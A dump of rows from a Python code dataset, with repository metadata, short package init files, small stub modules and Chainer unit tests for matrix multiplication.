        setattr(Secp256r1Test, "test_vector_%d" % k, make_test(k, x, y))


inject()
| 44.40081 | 97 | 0.893407 | 456 | 10,967 | 21.434211 | 0.421053 | 0.007366 | 0.013505 | 0.002046 | 0.002251 | 0 | 0 | 0 | 0 | 0 | 0 | 0.661287 | 0.079055 | 10,967 | 246 | 98 | 44.581301 | 0.306436 | 0 | 0 | 0.218579 | 0 | 0 | 0.906447 | 0.821191 | 0 | 1 | 0 | 0 | 0.010929 | 1 | 0.021858 | false | 0 | 0.010929 | 0 | 0.043716 | 0.005464 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e0291584c54208aa7bab450e1d9267a858a13af7 | 106 | py | Python | pyfgaws/logs/__init__.py | fulcrumgenomics/pyfgaws | 1f040666c869ce56b3df3ee8053d747dae4d54ef | [
"MIT"
] | 6 | 2020-06-04T20:35:31.000Z | 2021-12-28T18:51:31.000Z | pyfgaws/logs/__init__.py | fulcrumgenomics/pyfgaws | 1f040666c869ce56b3df3ee8053d747dae4d54ef | [
"MIT"
] | 13 | 2020-06-04T20:35:59.000Z | 2020-07-16T19:08:06.000Z | pyfgaws/logs/__init__.py | fulcrumgenomics/pyfgaws | 1f040666c869ce56b3df3ee8053d747dae4d54ef | [
"MIT"
] | null | null | null | from pyfgaws.logs.api import DEFAULT_POLLING_INTERVAL, Log
__all__ = ("DEFAULT_POLLING_INTERVAL", "Log")
| 26.5 | 58 | 0.801887 | 14 | 106 | 5.5 | 0.714286 | 0.363636 | 0.571429 | 0.649351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09434 | 106 | 3 | 59 | 35.333333 | 0.802083 | 0 | 0 | 0 | 0 | 0 | 0.254717 | 0.226415 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e039bb807cb0cd229dbd509b498d20cc22b178cb | 259 | py | Python | bread/views/__init__.py | basxsoftwareassociation/bread | 062ec82a565f81eff51ea91dc0f211139bc7fe96 | [
"Apache-2.0",
"BSD-3-Clause"
] | 13 | 2021-01-19T08:28:08.000Z | 2022-01-28T03:44:34.000Z | bread/views/__init__.py | basxsoftwareassociation/bread | 062ec82a565f81eff51ea91dc0f211139bc7fe96 | [
"Apache-2.0",
"BSD-3-Clause"
] | 80 | 2020-12-07T04:37:39.000Z | 2022-03-08T14:42:13.000Z | bread/views/__init__.py | basxsoftwareassociation/bread | 062ec82a565f81eff51ea91dc0f211139bc7fe96 | [
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2020-12-03T15:06:53.000Z | 2021-03-16T03:47:29.000Z | from .add import * # noqa
from .auth import * # noqa
from .browse import * # noqa
from .delete import * # noqa
from .edit import * # noqa
from .read import * # noqa
from .system import * # noqa
from .util import * # noqa
from .wizard import * # noqa
| 25.9 | 29 | 0.65251 | 36 | 259 | 4.694444 | 0.333333 | 0.532544 | 0.662722 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.243243 | 259 | 9 | 30 | 28.777778 | 0.862245 | 0.169884 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e04e6e33a1eda055c543cd37baacf1b34db5d035 | 49 | py | Python | Proj/routing.py | narae0409/playpay | 8ca27083639c5c6567216155417351a6eb1f100d | [
"MIT"
] | 2 | 2021-01-18T14:31:26.000Z | 2021-01-18T15:52:54.000Z | Proj/routing.py | narae0409/playpay | 8ca27083639c5c6567216155417351a6eb1f100d | [
"MIT"
] | null | null | null | Proj/routing.py | narae0409/playpay | 8ca27083639c5c6567216155417351a6eb1f100d | [
"MIT"
] | null | null | null | # chat/routing.py
from django.urls import re_path | 24.5 | 31 | 0.816327 | 9 | 49 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102041 | 49 | 2 | 31 | 24.5 | 0.886364 | 0.306122 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e05fe1e5311c3fa258f5a7c1f5c35b4f31e99877 | 47 | py | Python | augtistic/utils/__init__.py | milesgray/augtistic | 66baf2e1daf1c456d112bbe7a8c7515c9fe3804d | [
"MIT"
] | 1 | 2021-02-15T10:09:54.000Z | 2021-02-15T10:09:54.000Z | augtistic/utils/__init__.py | milesgray/augtistic | 66baf2e1daf1c456d112bbe7a8c7515c9fe3804d | [
"MIT"
] | null | null | null | augtistic/utils/__init__.py | milesgray/augtistic | 66baf2e1daf1c456d112bbe7a8c7515c9fe3804d | [
"MIT"
] | 2 | 2021-03-18T23:42:47.000Z | 2021-03-19T00:10:51.000Z | from .ensure_tf_install import check_tf_version | 47 | 47 | 0.914894 | 8 | 47 | 4.875 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.06383 | 47 | 1 | 47 | 47 | 0.886364 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e078422e91822e28f49353ae595859f9667bdaa0 | 148 | py | Python | learn_from_import/tools/file.py | YellowTulipShow/PythonScripts | 09bf756f08e6b66fe3b13206c3b972c3434e53ee | [
"Apache-2.0"
] | 1 | 2020-01-16T01:40:58.000Z | 2020-01-16T01:40:58.000Z | learn_from_import/tools/file.py | YellowTulipShow/PythonScripts | 09bf756f08e6b66fe3b13206c3b972c3434e53ee | [
"Apache-2.0"
] | null | null | null | learn_from_import/tools/file.py | YellowTulipShow/PythonScripts | 09bf756f08e6b66fe3b13206c3b972c3434e53ee | [
"Apache-2.0"
] | null | null | null | # coding: UTF-8
import convert
def read():
    """Run the project-local trim step, then log that read() was called.

    NOTE(review): `convert` is a sibling project module; its trim()
    semantics are not visible here.
    """
    convert.trim()
    print('file.read()')
def write():
    """Run the project-local trim step, then log that write() was called.

    NOTE(review): mirrors read(); only the logged message differs.
    """
    convert.trim()
    print('file.write()')
| 12.333333 | 25 | 0.587838 | 19 | 148 | 4.578947 | 0.578947 | 0.252874 | 0.367816 | 0.45977 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008621 | 0.216216 | 148 | 11 | 26 | 13.454545 | 0.741379 | 0.087838 | 0 | 0.285714 | 0 | 0 | 0.172932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | true | 0 | 0.142857 | 0 | 0.428571 | 0.285714 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0eba91294dbb48f63c6a0dbef746be50cab95712 | 294 | py | Python | app/mod_cmd/commands/projects/create_project.py | jaycode/Arthur.workspace | 7a581104141ee5f556e058b1276b4087a2921dfc | [
"Apache-2.0"
] | null | null | null | app/mod_cmd/commands/projects/create_project.py | jaycode/Arthur.workspace | 7a581104141ee5f556e058b1276b4087a2921dfc | [
"Apache-2.0"
] | null | null | null | app/mod_cmd/commands/projects/create_project.py | jaycode/Arthur.workspace | 7a581104141ee5f556e058b1276b4087a2921dfc | [
"Apache-2.0"
] | null | null | null | """Create a new project
"""
def run(project=None, args=None, **kwargs):
    """Create a new project.

    create_project [name]

    Args:
        project: Active project object; passed through unchanged.
        args: Positional command arguments; args[0] is the name of the
            project to be created.
        **kwargs: Extra options (unused).

    Returns:
        ``[project, None]`` — the unchanged project and no follow-up
        instruction.

    Raises:
        ValueError: If no project name was supplied.
    """
    # Original code referenced undefined names `name` and `instruction`
    # (always raised NameError) and used a mutable default `args=[]`.
    if args is None:
        args = []
    if not args:
        raise ValueError("create_project requires a project name")
    name = args[0]
    create_project(name)
    # No follow-up instruction is produced by this command.
    return [project, None]


def create_project(name):
    """Create the project named *name*.

    TODO: not yet implemented — currently a no-op placeholder.
    """
    pass
0ec8e46d89af1f3467b7f2b2ffaf43acebbabb87 | 8,322 | py | Python | tests/chainer_tests/functions_tests/math_tests/test_matmul.py | ytoyama/yans_chainer_hackathon | 744e7a5a67da8dec2869879f0adfae2d43eaf75c | [
"MIT"
] | null | null | null | tests/chainer_tests/functions_tests/math_tests/test_matmul.py | ytoyama/yans_chainer_hackathon | 744e7a5a67da8dec2869879f0adfae2d43eaf75c | [
"MIT"
] | 1 | 2016-11-09T06:32:32.000Z | 2016-11-09T10:20:04.000Z | tests/chainer_tests/functions_tests/math_tests/test_matmul.py | ytoyama/yans_chainer_hackathon | 744e7a5a67da8dec2869879f0adfae2d43eaf75c | [
"MIT"
] | 1 | 2018-11-18T00:36:51.000Z | 2018-11-18T00:36:51.000Z | import unittest
import numpy
import six
import chainer
from chainer import cuda
import chainer.functions as F
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
from chainer.testing import condition
class _TestMatMul(unittest.TestCase):
    """Shared matmul harness.

    Subclasses provide ``x1``, ``x2``, ``gy``, ``op`` and
    ``forward_answer`` in their setUp().
    """

    def check_forward(self, x1_data, x2_data):
        a = chainer.Variable(x1_data)
        b = chainer.Variable(x2_data)
        out = self.op(a, b)
        gradient_check.assert_allclose(self.forward_answer, out.data)

    @condition.retry(3)
    def test_matmul_forward_cpu(self):
        self.check_forward(self.x1, self.x2)

    @attr.gpu
    @condition.retry(3)
    def test_matmul_forward_gpu(self):
        self.check_forward(cuda.to_gpu(self.x1), cuda.to_gpu(self.x2))

    def check_backward(self, x1_data, x2_data, y_grad, atol):
        a = chainer.Variable(x1_data)
        b = chainer.Variable(x2_data)
        out = self.op(a, b)
        out.grad = y_grad
        out.backward()
        creator = out.creator

        # Re-run the op's raw forward for numerical differentiation.
        def forward():
            return creator.forward((a.data, b.data))

        ga, gb = gradient_check.numerical_grad(
            forward, (a.data, b.data), (out.grad,))
        gradient_check.assert_allclose(ga, a.grad, atol=atol)
        gradient_check.assert_allclose(gb, b.grad, atol=atol)

    @condition.retry(3)
    def test_matmul_backward_cpu(self):
        self.check_backward(self.x1, self.x2, self.gy, atol=1e-2)

    @attr.gpu
    @condition.retry(3)
    def test_matmul_backward_gpu(self):
        self.check_backward(
            cuda.to_gpu(self.x1), cuda.to_gpu(self.x2),
            cuda.to_gpu(self.gy), atol=1e-2)
# Matrix dimensions shared by the non-batched matmul test cases below.
m = 2   # rows of the left operand / rows of the product
k = 5   # shared inner (contraction) dimension
n = 10  # columns of the right operand / columns of the product
class TestMatMulMatrixMatrix(_TestMatMul):
    """matmul of a (m, k) matrix with a (k, n) matrix."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (m, k)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (k, n)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.matmul(a, b)
        self.forward_answer = numpy.dot(self.x1, self.x2)
class TestMatMulMatrixTMatrix(_TestMatMul):
    """matmul with the left operand transposed: (k, m).T @ (k, n)."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (k, m)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (k, n)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.matmul(a, b, transa=True)
        self.forward_answer = numpy.dot(self.x1.T, self.x2)
class TestMatMulMatrixMatrixT(_TestMatMul):
    """matmul with the right operand transposed: (m, k) @ (n, k).T."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (m, k)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (n, k)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.matmul(a, b, transb=True)
        self.forward_answer = numpy.dot(self.x1, self.x2.T)
class TestMatMulMatrixTMatrixT(_TestMatMul):
    """matmul with both operands transposed: (k, m).T @ (n, k).T."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (k, m)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (n, k)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.matmul(a, b, transa=True, transb=True)
        self.forward_answer = numpy.dot(self.x1.T, self.x2.T)
class TestMatMulVectorTVector(_TestMatMul):
    """Inner product of two (m,) vectors, producing a (1, 1) result."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (m,)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (m,)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (1, 1)).astype(numpy.float32)
        self.op = lambda a, b: F.matmul(a, b, transa=True)
        self.forward_answer = numpy.dot(self.x1, self.x2).reshape(1, 1)
class TestMatMulVectorVectorT(_TestMatMul):
    """Outer product of two (m,) vectors, producing an (m, m) result."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (m,)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (m,)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (m, m)).astype(numpy.float32)
        self.op = lambda a, b: F.matmul(a, b, transb=True)
        self.forward_answer = numpy.dot(
            self.x1.reshape(m, 1), self.x2.reshape(1, m))
batch_size = 10  # leading batch dimension for the batch_matmul cases below
class TestBatchMatMulMatrixMatrix(_TestMatMul):
    """batch_matmul: (B, m, k) @ (B, k, n) per batch element."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (batch_size, m, k)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (batch_size, k, n)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (batch_size, m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.batch_matmul(a, b)
        self.forward_answer = numpy.array(
            [numpy.dot(self.x1[idx], self.x2[idx])
             for idx in six.moves.range(batch_size)])
class TestBatchMatMulMatrixTMatrix(_TestMatMul):
    """batch_matmul with the left operand transposed: (B, k, m).T @ (B, k, n)."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (batch_size, k, m)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (batch_size, k, n)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (batch_size, m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.batch_matmul(a, b, transa=True)
        self.forward_answer = numpy.array(
            [numpy.dot(self.x1[idx].T, self.x2[idx])
             for idx in six.moves.range(batch_size)])
class TestBatchMatMulMatrixMatrixT(_TestMatMul):
    """batch_matmul with the right operand transposed: (B, m, k) @ (B, n, k).T."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (batch_size, m, k)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (batch_size, n, k)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (batch_size, m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.batch_matmul(a, b, transb=True)
        self.forward_answer = numpy.array(
            [numpy.dot(self.x1[idx], self.x2[idx].T)
             for idx in six.moves.range(batch_size)])
class TestBatchMatMulMatrixTMatrixT(_TestMatMul):
    """batch_matmul with both operands transposed: (B, k, m).T @ (B, n, k).T."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (batch_size, k, m)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (batch_size, n, k)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (batch_size, m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.batch_matmul(a, b, transa=True, transb=True)
        self.forward_answer = numpy.array(
            [numpy.dot(self.x1[idx].T, self.x2[idx].T)
             for idx in six.moves.range(batch_size)])
class TestBatchMatMulVectorTVector(_TestMatMul):
    """Batched inner products of (B, m) vectors, giving a (B, 1, 1) result."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (batch_size, m,)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (batch_size, m,)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (batch_size, 1, 1)).astype(numpy.float32)
        self.op = lambda a, b: F.batch_matmul(a, b, transa=True)
        self.forward_answer = numpy.array(
            [numpy.dot(self.x1[idx], self.x2[idx])
             for idx in six.moves.range(batch_size)]).reshape(batch_size, 1, 1)
class TestBatchMatMulVectorVectorT(_TestMatMul):
    """Batched outer products of (B, m) vectors, giving a (B, m, m) result."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (batch_size, m,)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (batch_size, m,)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (batch_size, m, m)).astype(numpy.float32)
        self.op = lambda a, b: F.batch_matmul(a, b, transb=True)
        self.forward_answer = numpy.array(
            [numpy.dot(self.x1[idx].reshape(m, 1), self.x2[idx].reshape(1, m))
             for idx in six.moves.range(batch_size)])
class TestBatchMatMulMatrixMatrixBatchSize1(_TestMatMul):
    """Degenerate batch of size 1: (1, m, k) @ (1, k, n)."""

    def setUp(self):
        uniform = numpy.random.uniform
        self.x1 = uniform(.5, 1, (1, m, k)).astype(numpy.float32)
        self.x2 = uniform(.5, 1, (1, k, n)).astype(numpy.float32)
        self.gy = uniform(-1, 1, (1, m, n)).astype(numpy.float32)
        self.op = lambda a, b: F.batch_matmul(a, b)
        self.forward_answer = numpy.array(
            [numpy.dot(self.x1[idx], self.x2[idx])
             for idx in six.moves.range(1)])
testing.run_module(__name__, __file__)
| 36.025974 | 77 | 0.615117 | 1,206 | 8,322 | 4.151741 | 0.076285 | 0.08568 | 0.140204 | 0.17136 | 0.779109 | 0.763931 | 0.75714 | 0.739964 | 0.725984 | 0.712003 | 0 | 0.042756 | 0.232757 | 8,322 | 230 | 78 | 36.182609 | 0.741425 | 0 | 0 | 0.585227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017045 | 1 | 0.107955 | false | 0 | 0.056818 | 0 | 0.244318 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.